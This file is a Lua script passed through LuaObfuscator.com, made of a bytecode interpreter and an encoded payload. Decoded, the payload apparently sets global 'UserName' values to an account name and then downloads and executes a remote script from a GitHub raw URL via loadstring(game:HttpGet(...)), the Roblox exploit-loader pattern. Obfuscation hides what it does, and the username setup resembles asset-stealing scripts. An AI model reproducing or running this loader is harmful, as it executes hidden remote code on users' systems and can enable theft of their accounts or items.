--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==3) then v25=function()local v39=v24();local v40=v24();local v41=1;local v42=(v21(v40,1 + 0 ,20) * ((1 + 1)^32)) + v39 ;local v43=v21(v40,2 + 19 ,45 -14 );local v44=((v21(v40,22 + 10 )==(1893 -(1566 + 44 + 282))) and  -((58 -(47 + 10)) + 0)) or (1 -0) ;if (v43==(0 + 0)) then if (v42==(0 -(0 -0))) then return v44 * 0 ;else local v80=0 + 0 ;while true do if ((0 -(0 -0))==v80) then v43=1;v41=0 -0 ;break;end end end elseif (v43==(397 + 1650)) then return ((v42==(1237 -(55 + 1182))) and (v44 * ((1 -(1049 -(581 + 468)))/(0 -(0 + 0))))) or (v44 * NaN) ;end return v8(v44,v43-(1835 -(97 + 715)) ) * (v41 + (v42/((1 + (869 -(105 + 763)))^(123 -71)))) ;end;v26=nil;v26=function(v31)local v45=0 + 0 ;local v46;local v47;while true do if ((0 -0)==v45) then v46=nil;if  not v31 then local v90=0 -0 ;while true do if (v90==(122 -(86 + 36))) then v31=v24();if (v31==(1244 -(1010 + 234))) then return "";end break;end end end v45=1 -0 ;end if ((6 -3)==v45) then return v6(v47);end if (v45==((510 -(330 + 178)) -1)) then v46=v3(v16,v19,(v19 + v31) -(1197 -(308 + 888)) );v19=v19 + v31 ;v45=1646 -(440 + (3991 -2787)) ;end if (v45==(2 -(1754 -(587 + 1167)))) then v47={};for v81=1 + 0 , #v46 do v47[v81]=v2(v1(v3(v46,v81,v81)));end v45=1176 -(262 + 911) ;end end end;v27=v24;v18=4;end if (v18==5) then v30=nil;v30=function(v32,v33,v34)local v48=0;local v49;local v50;local v51;while true do if (v48==0) then v49=v32[1];v50=v32[2];v48=1;end if (v48==1) then v51=v32[3];return function(...)local v83=0;local v84;local v85;local v86;local v87;local v88;while true do if (v83==1) then v86={...};v87=v12("#",...) -1 ;v83=2;end if (3==v83) then A,B=v28(v11(v88));if  not A[1] then local v104=0;local v105;while true do if (v104==0) then v105=v32[4][v84] or "?" ;error("Script error at ["   .. v105   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end break;end if (v83==0) then v84=1;v85= -1;v83=1;end if (v83==2) then v88=nil;v88=function()local v94=v49;local v95=v50;local v96=v51;local v97=v28;local v98={};local v99={};local v100={};for v106=0,v87 do if ((v106>=v96) or ((2635 + 202)>=(3385 -(73 + 4)))) then v98[v106-v96 ]=v86[v106 + (173 -(12 + 160)) ];else v100[v106]=v86[v106 + 1 + 0 ];end end local v101=(v87-v96) + (1678 -(446 + 1231)) ;local v102;local v103;while true do local v107=0 -(0 -0) ;local v108;while true do if ((v107==(0 + (1580 -(553 + 1027)))) or ((1677 + (942 -(305 + 484)))==(625 + 1533 + (3478 -(482 + 1027))))) then v108=0 -0 ;while true do if ((((5939 + 3507) -4592)>=(5174 -(656 + 235))) and (v108==(4 -3))) then if ((v103<=(2 + 2)) or (3117>(2728 + 591))) then if ((v103<=1) or (((8647 -2905) -((182 -121) + 1604))<(5052 -(859 + 117)))) then if ((v103==(1054 -(1039 + 15))) or ((15564 -11856)<=(8 + 1013))) then local v134=724 -(174 + 550) ;local v135;local v136;local v137;local v138;local v139;while true do if (((4975 -(1118 + 175))==(1528 + (5963 -3809))) and (v134==(4 -3))) then v137=nil;v138=nil;v134=(4 -3) + 1 ;end if ((v134==(2 + 0)) or ((4296 -(777 + 1217))<(1368 + 668))) then v139=nil;while true do if ((v135==(1711 -(1106 + 603))) or ((1593 -1002)>(492 + 854))) then for v171=v136,v85 do local v172=545 -(303 + 242) ;local v173;while true do if (((7442 -(5866 -3036))>((17363 -10273) -4565)) and (v172==(440 -(402 + 38)))) then v173=0 -0 ;while true do if ((v173==(0 -0)) or ((5511 -2587)<=(977 + 293))) then v139=v139 + 1 + 0 ;v100[v171]=v137[v139];break;end end break;end end end break;end if (((2631 + 184)>((321 -205) + 72)) and (v135==(723 -(596 + 127)))) then v136=v102[1 + (506 -(437 + 68)) ];v137,v138=v97(v100[v136](v13(v100,v136 + (1586 -(66 + 1519)) ,v102[1448 -(149 + 1296) ])));v135=1 + 0 + 0 ;end if ((v135==(1285 -(57 + 1227))) or ((41 + 24)>(7165 -4819))) then v85=(v138 + v136) -((2612 -(537 + 1231)) -(370 + 36 + 437)) ;v139=1188 -(66 + 1122) ;v135=(83 -54) -(10 + 17) ;end end break;end if ((v134==0) or ((7544 -4351)<=(2850 -((18 -8) + 145)))) then v135=326 -(316 + 10) ;v136=nil;v134=1;end end else v100[v102[5 -(809 -(320 + 486)) ]]=v102[3 + 0 ];end elseif ((v103<=(758 -(525 + 231))) or ((869 -(779 -293))>(5343 -(127 + 1194)))) then do return;end elseif ((v103>(1 + 2)) or ((360 + 171)==(3548 -2510))) then local v152=0 + 0 ;local v153;local v154;while true do if ((((1169 -306) -(264 + 599))==v152) or ((11065 -8194)<=(2176 -1096))) then v153=0;v154=nil;v152=1 + 0 ;end if ((v152==(2 -1)) or ((2614 -(119 + 303))>((6393 -(1241 + 260)) -(1028 + 10)))) then while true do if ((v153==(49 -(22 + 27))) or ((2582 -(1581 -(369 + 373)))>=(5256 -(710 + 1103)))) then v154=v102[4 -2 ];v100[v154]=v100[v154](v13(v100,v154 + (1 -(1225 -(738 + 487))) ,v85));break;end end break;end end elseif ((v100[v102[58 -(34 + 22) ]]==v102[10 -6 ]) or ((3092 -(207 + 121))>=(3861 + 869))) then v84=v84 + 1 + 0 ;else v84=v102[5 -2 ];end elseif ((v103<=(1290 -(12 + (1409 -(60 + 77))))) or ((459 + (389 -228))>=(8965 -(3920 + 1545)))) then if (((4150 -(401 + 283))>(2463 -((1455 -(758 + 90)) + 302))) and (v103>(1685 -(1234 + 446)))) then v84=v102[1394 -(515 + 876) ];else v100[v102[204 -(93 + (1802 -(30 + 1663))) ]]();end elseif ((v103<=7) or ((3181 -(651 + 551))==((1016 + 2040) -(281 + 574)))) then v34[v102[9 -6 ]]=v100[v102[9 -7 ]];elseif (((12906 -10206)==(3600 -(547 + 353))) and (v103>8)) then v100[v102[1 + 1 ]]=v34[v102[1 + 2 ]];else local v157=963 -(754 + (319 -(52 + 58))) ;local v158;local v159;local v160;while true do if (((12376 -9431)>((2889 -(181 + 132)) -996)) and (v157==(0 -(0 -0)))) then v158=0 + 0 ;v159=nil;v157=1 + 0 ;end if (((1323 + 3544)>(3030 -(384 + (3914 -2523)))) and ((683 -(568 + (216 -102)))==v157)) then v160=nil;while true do if ((v158==0) or ((5313 -3528)>(5465 -2105))) then local v176=(1803 -(205 + 1598)) + 0 ;local v177;while true do if (((8920 -4651)>(1097 + (455 -279))) and (v176==(1701 -(600 + 1101)))) then v177=1062 -(664 + (1422 -1024)) ;while true do if (((132 -76)<=(3699 -(1384 + 255))) and ((0 -(0 -0))==v177)) then v159=v102[3 -1 ];v160=v100[v102[1 + 2 ]];v177=(2 + 0) -1 ;end if ((v177==(1 -(1824 -(165 + 1659)))) or ((4604 -(3079 -(633 + 1209)))<=(1718 -(95 + (261 -88))))) then v158=1 -0 ;break;end end break;end end end if (((1115 -678)<(5168 -3658)) and (v158==(1 + 0))) then v100[v159 + (1300 -(83 + 1216)) ]=v160;v100[v159]=v160[v102[4]];break;end end break;end end end v84=v84 + (1599 -(1356 + 242)) ;break;end if ((((18688 -5925) -8271)<(5257 -((123 -83) + 540))) and (v108==(0 + 0))) then local v121=0 + 0 ;while true do if (((3251 -1574)<(9419 -5699)) and (v121==(3 -2))) then v108=81 -(52 + 28) ;break;end if (((0 -0)==v121) or ((5735 -3136)>=(3832 -((203 -118) + 1094)))) then local v126=1907 -(1582 + 284 + 41) ;while true do if (((2332 + 1896)>(480 -145)) and (v126==(4 -3))) then v121=161 -(50 + 110) ;break;end if (((0 + 0)==v126) or ((1920 -((2961 -(607 + 1050)) + 303))>=(5676 -1527))) then v102=v94[v84];v103=v102[(2 -1) + 0 ];v126=2 -(1 + 0) ;end end end end end end break;end end end end;v83=3;end end end;end end end;return v30(v29(),{},v17)(...);end if (2==v18) then v23=function()local v52=0 + (0 -0) ;local v53;local v54;while true do if ((1 -0)==v52) then return (v54 * 256) + v53 ;end if (v52==0) then v53,v54=v1(v16,v19,v19 + (2 -0) );v19=v19 + (1956 -(1894 + 60)) ;v52=1 -0 ;end end end;v24=nil;v24=function()local v55,v56,v57,v58=v1(v16,v19,v19 + 1 + 2 );v19=v19 + (9 -5) ;return (v58 * (16777497 -(112 + 169))) + (v57 * (20938 + 44598)) + (v56 * (60 + (581 -385))) + v55 ;end;v25=nil;v18=3;end if (v18==4) then v28=nil;v28=function(...)return {...},v12("#",...);end;v29=nil;v29=function()local v59=0 + 0 ;local v60;local v61;local v62;local v63;local v64;local v65;local v66;while true do if (v59~=(1 -0)) then else v62=nil;v63=nil;v59=2;end if (v59~=0) then else local v77=0;local v78;while true do if ((1822 -(969 + 853))==v77) then v78=0 -0 ;while true do if (v78~=(0 + 0)) then else local v109=0 -0 ;while true do if (v109==(0 -0)) then v60=0;v61=nil;v109=1 + 0 ;end if (v109==(2 -1)) then v78=1;break;end end end if (v78~=1) then else v59=1 + 0 ;break;end end break;end end end if (v59~=3) then else v66=nil;while true do local v89=0 -0 ;while true do if (v89~=0) then else local v91=0 + 0 ;while true do if (v91==(1642 -(335 + 1307))) then local v116=0 -0 ;while true do if (v116==1) then v91=1 + 0 ;break;end if (v116==0) then if (v60~=(3 -0)) then else local v122=0;while true do local v125=828 -(63 + 765) ;while true do if (v125~=(0 + 0)) then else if ((0 -0)==v122) then for v148=1,v24() do v62[v148-(1 + 0) ]=v29();end for v150=1 + 0 ,v24() do v63[v150]=v24();end v122=1 + 0 ;end if (v122~=(4 -3)) then else return v64;end break;end end end end if (v60==1) then local v123=0 -0 ;local v124;while true do if (v123~=(242 -(197 + 45))) then else v124=543 -(471 + 72) ;while true do if (v124~=(1873 -(323 + 1550))) then else v64={v61,v62,nil,v63};v65=v24();v124=1250 -(1046 + 203) ;end if (v124==(117 -(17 + 99))) then v66={};v60=565 -(193 + 370) ;break;end end break;end end end v116=2 -1 ;end end end if (v91==1) then v89=1;break;end end end if (1==v89) then if (v60==0) then local v110=0 -0 ;local v111;local v112;while true do if (v110~=(0 + 0)) then else v111=0;v112=nil;v110=1565 -(626 + 938) ;end if (v110~=1) then else while true do if (v111~=(150 -(32 + 118))) then else v112=0 -0 ;while true do if (v112==0) then local v127=0;while true do if (v127==(1550 -(1339 + 210))) then v112=1;break;end if (v127~=(0 + 0)) then else v61={};v62={};v127=1 + 0 ;end end end if (v112==1) then v63={};v60=1 -0 ;break;end end break;end end break;end end end if ((9 -7)==v60) then local v113=0;local v114;local v115;while true do if (v113==1) then while true do if (v114==0) then v115=0;while true do if (v115==(649 -(303 + 346))) then local v128=1959 -(845 + 1114) ;while true do if (v128~=(0 + 0)) then else local v147=0;while true do if (v147==(301 -(136 + 164))) then v128=1;break;end if ((0 + 0)~=v147) then else for v163=1 -0 ,v65 do local v164=0 -0 ;local v165;local v166;local v167;local v168;while true do if ((1 -0)==v164) then v167=nil;v168=nil;v164=2;end if (v164~=2) then else while true do if (v165==(0 -0)) then local v185=0;while true do if (1~=v185) then else v165=1 + 0 ;break;end if ((0 -0)~=v185) then else v166=0;v167=nil;v185=1;end end end if ((2 -1)==v165) then v168=nil;while true do if (v166~=(113 -(5 + 108))) then else local v192=0;local v193;local v194;while true do if (v192==(0 + 0)) then v193=0;v194=nil;v192=4 -3 ;end if (v192==1) then while true do if (v193~=(0 + 0)) then else v194=1093 -(191 + 902) ;while true do if (0==v194) then v167=v22();v168=nil;v194=234 -(36 + 197) ;end if (v194~=(672 -(510 + 161))) then else v166=1920 -(267 + 1652) ;break;end end break;end end break;end end end if (v166==(1 -0)) then if (v167==1) then v168=v22()~=0 ;elseif (v167==(2 -0)) then v168=v25();elseif (v167==(3 + 0)) then v168=v26();end v66[v163]=v168;break;end end break;end end break;end if (v164~=0) then else v165=0;v166=nil;v164=1;end end end v64[11 -8 ]=v22();v147=1 + 0 ;end end end if (1==v128) then v115=2 -1 ;break;end end end if (v115==(1321 -(866 + 454))) then for v129=1050 -(48 + 1001) ,v24() do local v130=0;local v131;local v132;local v133;while true do if (v130~=(0 -0)) then else v131=1413 -(146 + 1267) ;v132=nil;v130=4 -3 ;end if (v130~=1) then else v133=nil;while true do if (0==v131) then local v169=0;while true do if (v169==(888 -(869 + 19))) then v132=0;v133=nil;v169=1 + 0 ;end if (v169~=(1 + 0)) then else v131=1341 -(87 + 1253) ;break;end end end if (v131~=(2 -1)) then else while true do if (0==v132) then v133=v22();if (v21(v133,1,1)==0) then local v181=798 -(433 + 365) ;local v182;local v183;local v184;while true do if (v181==(2 + 0)) then local v186=0;while true do if (v186~=(1 + 0)) then else v181=1879 -(391 + 1485) ;break;end if (v186==(802 -(618 + 184))) then if (v21(v183,1196 -(801 + 394) ,4 -3 )~=1) then else v184[2]=v66[v184[2]];end if (v21(v183,2,2)~=1) then else v184[10 -7 ]=v66[v184[1 + 2 ]];end v186=1 + 0 ;end end end if (v181==3) then if (v21(v183,3,3)~=(1 + 0)) then else v184[1727 -(858 + 865) ]=v66[v184[4]];end v61[v129]=v184;break;end if (v181~=1) then else v184={v23(),v23(),nil,nil};if (v182==0) then local v200=0 -0 ;local v201;local v202;local v203;while true do if (v200==(1 + 0)) then v203=nil;while true do if (v201==0) then v202=0;v203=nil;v201=2 -1 ;end if (v201==(1 + 0)) then while true do if (v202==0) then v203=0 -0 ;while true do if ((0 + 0)==v203) then v184[3]=v23();v184[17 -13 ]=v23();break;end end break;end end break;end end break;end if (v200==(0 -0)) then v201=0 -0 ;v202=nil;v200=1;end end elseif (v182==(1732 -(499 + 1232))) then v184[3]=v24();elseif (v182==2) then v184[3 -0 ]=v24() -((2 + 0)^16) ;elseif (v182~=(3 + 0)) then else local v211=0;local v212;local v213;while true do if (v211==1) then while true do if (v212==(0 -0)) then v213=0;while true do if (v213==0) then v184[1866 -(1234 + 629) ]=v24() -(2^16) ;v184[14 -10 ]=v23();break;end end break;end end break;end if ((700 -(684 + 16))==v211) then v212=0;v213=nil;v211=1109 -(528 + 580) ;end end end v181=2;end if (v181==(0 -0)) then local v188=0;local v189;while true do if (v188==(1346 -(1228 + 118))) then v189=0;while true do if (v189~=0) then else local v210=0 -0 ;while true do if (v210==1) then v189=1 + 0 ;break;end if (0==v210) then v182=v21(v133,9 -7 ,3);v183=v21(v133,4,6 + 0 );v210=1;end end end if (v189==1) then v181=1;break;end end break;end end end end end break;end end break;end end break;end end end v60=1 + 2 ;break;end end break;end end break;end if (v113==0) then v114=0 -0 ;v115=nil;v113=1 + 0 ;end end end break;end end end break;end if ((1453 -(69 + 1382))~=v59) then else local v79=0 + 0 ;while true do if (v79~=(453 -(204 + 248))) then else v59=3;break;end if (v79==0) then v64=nil;v65=nil;v79=1;end end end end end;v18=5;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v35)if (v1(v35,2)==79) then v20=v0(v3(v35,1,1));return "";else local v68=0;local v69;while true do if (v68==0) then v69=v2(v0(v35,16));if v20 then local v92=0;local v93;while true do if (v92==0) then v93=v5(v69,v20);v20=nil;v92=1;end if (v92==1) then return v93;end end else return v69;end break;end end end end);v21=nil;v18=1;end if (v18==1) then v21=function(v36,v37,v38)if v38 then local v70=1199 -((1874 -(122 + 1528)) + 975) ;local v71;while true do if (v70==(0 + 0 + 0)) then v71=(v36/((9 -7)^(v37-1)))%((2 + 0)^(((v38-(1 -0)) -(v37-(1 + 0))) + 1)) ;return v71-(v71%(1 + 0)) ;end end else local v72=0 + 0 ;local v73;while true do if (v72==(1601 -(1165 + 436))) then v73=(3 -1)^(v37-1) ;return (((v36%(v73 + v73))>=v73) and (3 -2)) or (0 + 0) ;end end end end;v22=nil;v22=function()local v67=v1(v16,v19,v19);v19=v19 + 1 ;return v67;end;v23=nil;v18=2;end end end v15("LOL!093O00028O0003083O00557365724E616D6503083O007A6F2O6E6531303803093O00557365724E616D6532026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B34662O742F72692O7A6875622F6D61696E2F4E65772E6C756100143O0012013O00013O0026033O0008000100010004063O00080001001201000100033O001207000100023O001201000100033O001207000100043O0012013O00053O0026033O0001000100050004063O00010001001209000100063O001209000200073O002008000200020008001201000400096O000200044O000400013O00022O00050001000100010004063O001300010004063O000100012O00023O00017O00143O00023O00043O00043O00053O00053O00063O00063O00073O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O00",v9(),...);end
